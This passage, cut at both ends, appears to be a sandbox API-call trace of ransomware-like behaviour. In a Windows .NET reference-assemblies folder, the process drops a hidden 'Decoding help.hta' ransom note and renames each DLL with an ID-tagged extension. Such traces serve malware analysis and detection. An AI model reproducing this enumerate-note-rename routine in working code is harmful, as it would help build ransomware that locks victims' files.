Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0052.281] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0xffffffff [0052.281] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0054.028] WriteFile (in: hFile=0x2fc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x16b9fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x16b9fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0056.112] CloseHandle (hObject=0x2fc) returned 1 [0056.112] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0056.112] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Microsoft.Build.Conversion.v3.5.dll") returned -1 [0056.112] lstrlenW (lpString="Microsoft.Build.Conversion.v3.5.dll") returned 35 [0056.112] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0056.112] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.112] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.112] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Microsoft.Build.Conversion.v3.5.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Conversion.v3.5.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Conversion.v3.5.dll" [0056.113] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Conversion.v3.5.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Conversion.v3.5.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Conversion.v3.5.dll" [0056.113] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Conversion.v3.5.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Conversion.v3.5.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Conversion.v3.5.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.113] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Conversion.v3.5.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.conversion.v3.5.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Conversion.v3.5.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.conversion.v3.5.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.265] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xade574cb, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xade574cb, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xadfae12e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x9c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Build.Engine.dll", cAlternateFileName="")) returned 1 [0056.606] lstrcpyW (in: lpString1=0x9659e88, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.607] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.607] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0056.607] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0056.607] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Microsoft.Build.Engine.dll") returned -1 [0056.607] lstrlenW (lpString="Microsoft.Build.Engine.dll") returned 26 [0056.607] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0056.607] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.607] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.607] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Microsoft.Build.Engine.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Engine.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Engine.dll" [0056.607] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Engine.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Engine.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Engine.dll" [0056.607] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Engine.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Engine.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Engine.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.607] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Engine.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.engine.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Engine.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.engine.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.610] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f2b6d7d, ftCreationTime.dwHighDateTime=0x1ca03fc, ftLastAccessTime.dwLowDateTime=0x1f2b6d7d, ftLastAccessTime.dwHighDateTime=0x1ca03fc, ftLastWriteTime.dwLowDateTime=0x5cf16e3d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x9000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Build.Framework.dll", cAlternateFileName="")) returned 1 [0056.612] lstrcpyW (in: lpString1=0x2aa90f28, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.612] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.612] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0056.612] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0056.613] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Microsoft.Build.Framework.dll") returned -1 [0056.613] lstrlenW (lpString="Microsoft.Build.Framework.dll") returned 29 [0056.613] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0056.613] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.613] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.613] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Microsoft.Build.Framework.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Framework.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Framework.dll" [0056.613] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Framework.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Framework.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Framework.dll" [0056.613] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Framework.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Framework.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Framework.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.613] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Framework.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.framework.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Framework.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.framework.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.613] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad64ea7d, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xad64ea7d, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xad674bdd, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x14000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Build.Utilities.v3.5.dll", cAlternateFileName="")) returned 1 [0056.613] lstrcpyW (in: lpString1=0x2aa90f28, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.613] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.613] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0056.613] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0056.613] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Microsoft.Build.Utilities.v3.5.dll") returned -1 [0056.613] lstrlenW (lpString="Microsoft.Build.Utilities.v3.5.dll") returned 34 [0056.613] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0056.613] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.613] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.613] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Microsoft.Build.Utilities.v3.5.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Utilities.v3.5.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Utilities.v3.5.dll" [0056.614] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Utilities.v3.5.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Utilities.v3.5.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Utilities.v3.5.dll" [0056.614] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Utilities.v3.5.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Utilities.v3.5.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Utilities.v3.5.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.614] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Utilities.v3.5.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.utilities.v3.5.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Utilities.v3.5.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.utilities.v3.5.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.614] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f40d9c2, ftCreationTime.dwHighDateTime=0x1ca03fc, ftLastAccessTime.dwLowDateTime=0x1f40d9c2, ftLastAccessTime.dwHighDateTime=0x1ca03fc, ftLastWriteTime.dwLowDateTime=0x5cffb671, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xa800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.VisualC.STLCLR.dll", cAlternateFileName="")) returned 1 [0056.614] lstrcpyW (in: lpString1=0x2aa90f28, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.614] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.614] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0056.614] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0056.614] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Microsoft.VisualC.STLCLR.dll") returned -1 [0056.614] lstrlenW (lpString="Microsoft.VisualC.STLCLR.dll") returned 28 [0056.614] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0056.614] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.614] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.614] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Microsoft.VisualC.STLCLR.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.VisualC.STLCLR.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.VisualC.STLCLR.dll" [0056.614] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.VisualC.STLCLR.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.VisualC.STLCLR.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.VisualC.STLCLR.dll" [0056.614] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.VisualC.STLCLR.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.VisualC.STLCLR.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.VisualC.STLCLR.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.614] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.VisualC.STLCLR.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.visualc.stlclr.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.VisualC.STLCLR.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.visualc.stlclr.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.614] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x803d8e97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x803d8e97, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RedistList", cAlternateFileName="REDIST~1")) returned 1 [0056.614] lstrcmpW (lpString1=".", lpString2="RedistList") returned -1 [0056.614] lstrcmpW (lpString1="..", lpString2="RedistList") returned -1 [0056.615] lstrcmpiW (lpString1="windows", lpString2="RedistList") returned 1 [0056.617] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.617] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.617] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="RedistList" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList" [0056.617] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\*.*" [0056.617] GlobalMemoryStatus (in: lpBuffer=0x16b9fd10 | out: lpBuffer=0x16b9fd10) [0056.617] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2aa90f28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x508 [0056.622] CloseHandle (hObject=0x508) returned 1 [0056.623] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad69ad3d, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xad69ad3d, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xad69ad3d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xb000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.AddIn.Contract.dll", cAlternateFileName="")) returned 1 [0056.624] lstrcpyW (in: lpString1=0x2aab8fa0, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.625] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.625] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0056.625] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0056.625] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.AddIn.Contract.dll") returned -1 [0056.625] lstrlenW (lpString="System.AddIn.Contract.dll") returned 25 [0056.625] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.625] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.625] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.AddIn.Contract.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.Contract.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.Contract.dll" [0056.625] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.Contract.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.Contract.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.Contract.dll" [0056.625] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.Contract.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference 